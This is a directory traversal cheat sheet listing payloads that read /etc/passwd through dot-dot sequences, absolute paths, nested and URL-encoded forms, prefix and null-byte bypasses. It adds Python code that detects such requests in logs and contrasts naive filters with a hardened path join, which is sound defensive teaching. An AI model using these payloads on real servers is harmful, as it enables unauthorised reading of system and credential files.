Directory traversal
A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
-- Wikipedia
Attacks
Traversal sequence (dot dot slash)
For each ../ you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.
../../../etc/passwd
Absolute path
Sometimes you can just supply an absolute path.
/etc/passwd
Bypass filters
Nested traversal sequences
When the traversal sequence is only stripped once and not recursively, you can use nested sequences, so that after the inner one is stripped a traversal sequence still remains: ....// becomes ../
....//....//etc/passwd
URL encoding
Single URL encoding
%2e%2e%2f
Double URL encoding (the %-character is itself encoded, as %25)
%252e%252e%252f
Non-standard encodings
..%c0%af
..%ef%bc%8f
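Added example (not part of the original notes): detection logic for the encoded variants above, run over a handful of constructed request paths. It normalises each path the way a permissive server might (bounded repeated percent-decoding for double encoding, mapping the overlong UTF-8 form %c0%af to "/", NFKC-folding the fullwidth solidus %ef%bc%8f to "/") and only then looks for a traversal sequence. The sample requests, the OVERLONG table and the three-round decode limit are assumptions chosen for the demo, and the pattern is deliberately loose because this is meant for flagging requests in logs, not for access control.

```python
import re
import unicodedata
from urllib.parse import unquote_to_bytes

# Constructed sample request paths, as they might appear in an access log.
# The first one is benign; the rest use the bypasses listed on the page.
SAMPLE_REQUESTS = [
    "/images/logo.png",
    "/images/../../../etc/passwd",
    "/images/%2e%2e%2f%2e%2e%2fetc/passwd",          # single URL encoding
    "/images/%252e%252e%252fetc/passwd",             # double URL encoding
    "/images/..%c0%af..%c0%afetc/passwd",            # overlong UTF-8 '/'
    "/images/..%ef%bc%8f..%ef%bc%8fetc/passwd",      # fullwidth solidus
    "/images/....//....//etc/passwd",                # nested sequence
    "/download?file=../../../etc/passwd%00.jpg",     # null byte
]

# Overlong two-byte UTF-8 forms that lenient decoders historically mapped
# to ASCII ('/', '.', '\\'). Assumed table for this demo.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\xae": b".", b"\xc1\x9c": b"\\"}

# Upper bound on decode rounds so a pathological input cannot loop forever.
MAX_DECODE_ROUNDS = 3

# Loose pattern: any '..' immediately followed by a slash, after normalisation.
TRAVERSAL = re.compile(r"\.\./")


def normalize(raw: str) -> str:
    """Canonicalise a request path so encoded traversal becomes visible."""
    data = raw.encode("utf-8")
    # Repeated decoding exposes double (and triple) percent-encoding.
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    # Map known overlong byte sequences to the ASCII they stand for.
    for bad, good in OVERLONG.items():
        data = data.replace(bad, good)
    text = data.decode("utf-8", errors="replace")
    # NFKC folds U+FF0F FULLWIDTH SOLIDUS (from %ef%bc%8f) to '/'.
    text = unicodedata.normalize("NFKC", text)
    # Treat backslashes as separators too, as Windows-hosted apps would.
    return text.replace("\\", "/")


def is_traversal_attempt(raw: str) -> bool:
    """True if the normalised path carries a traversal sequence or a null byte."""
    text = normalize(raw)
    return bool(TRAVERSAL.search(text)) or "\x00" in text


def flag_requests(requests):
    """Return the subset of request paths that look like traversal attempts."""
    return [r for r in requests if is_traversal_attempt(r)]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        mark = "FLAG" if is_traversal_attempt(req) else "ok  "
        print(mark, req, "->", normalize(req))
```

The nested form ....// is caught only because the pattern is loose; a stricter check anchored on path separators would miss it, which is exactly why the page lists it as a bypass.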
Mandatory prefix
If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.
/var/www/images/../../../etc/passwd
Null byte termination
E.g. if the app checks for certain file extensions, you may be able to bypass the filter by supplying a null byte %00 and thereby terminating the string early.
../../../etc/passwd%00.jpg
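Added example (not from the original notes) covering the whole "Bypass filters" section: the two filters the page describes as bypassable (strip "../" once; check a mandatory prefix on the raw string) next to a hardened join that decodes exactly once, rejects null bytes and absolute paths, canonicalises with realpath and only then checks that the result is still inside the base directory. The base directory is a temporary directory created for the demo, and the /var/www/images prefix is taken from the page; both are assumptions, as are the function names.

```python
import os
import tempfile
from urllib.parse import unquote

# Demo base directory (assumed); realpath so symlinked temp dirs compare equal.
BASE_DIR = os.path.realpath(tempfile.mkdtemp(prefix="traversal-demo-"))
PREFIX = "/var/www/images/"   # the mandatory prefix from the page


def naive_strip(user_path: str) -> str:
    """Filter the page describes as bypassable: removes '../' one pass only."""
    return user_path.replace("../", "")


def naive_prefix_ok(path: str) -> bool:
    """Prefix check on the raw string: passes '/var/www/images/../../../etc/passwd'."""
    return path.startswith(PREFIX)


def canonical_prefix_ok(path: str) -> bool:
    """Prefix check after lexical canonicalisation (normpath resolves '..')."""
    return os.path.normpath(path).startswith(PREFIX)


def safe_join(base: str, user_path: str) -> str:
    """Resolve user_path under base, raising ValueError on any escape attempt.

    The string that is validated is the same string that is used: it is
    percent-decoded exactly once here, never again afterwards.
    """
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    if os.path.isabs(decoded):
        raise ValueError("absolute path not allowed")
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, decoded))
    # Containment check on canonical paths, not on the raw user string.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError("path escapes base directory")
    return candidate


def is_allowed(user_path: str) -> bool:
    """Convenience wrapper: True if safe_join accepts the path."""
    try:
        safe_join(BASE_DIR, user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("strip once:", naive_strip("....//....//etc/passwd"))
    payload = PREFIX + "../../../etc/passwd"
    print("raw prefix check:", naive_prefix_ok(payload),
          "canonical prefix check:", canonical_prefix_ok(payload))
    for p in ["logo.png", "../../../etc/passwd", "%2e%2e%2fetc/passwd",
              "/etc/passwd", "../../../etc/passwd%00.jpg", "....//....//etc/passwd"]:
        print(f"{p!r:40} allowed={is_allowed(p)}")
```

Note that the hardened join accepts ....//....//etc/passwd: because nothing is stripped, "...." is just an oddly named directory inside the base, so the path never leaves it. The nested sequence is only dangerous in combination with a strip-once filter, which is the point the page makes.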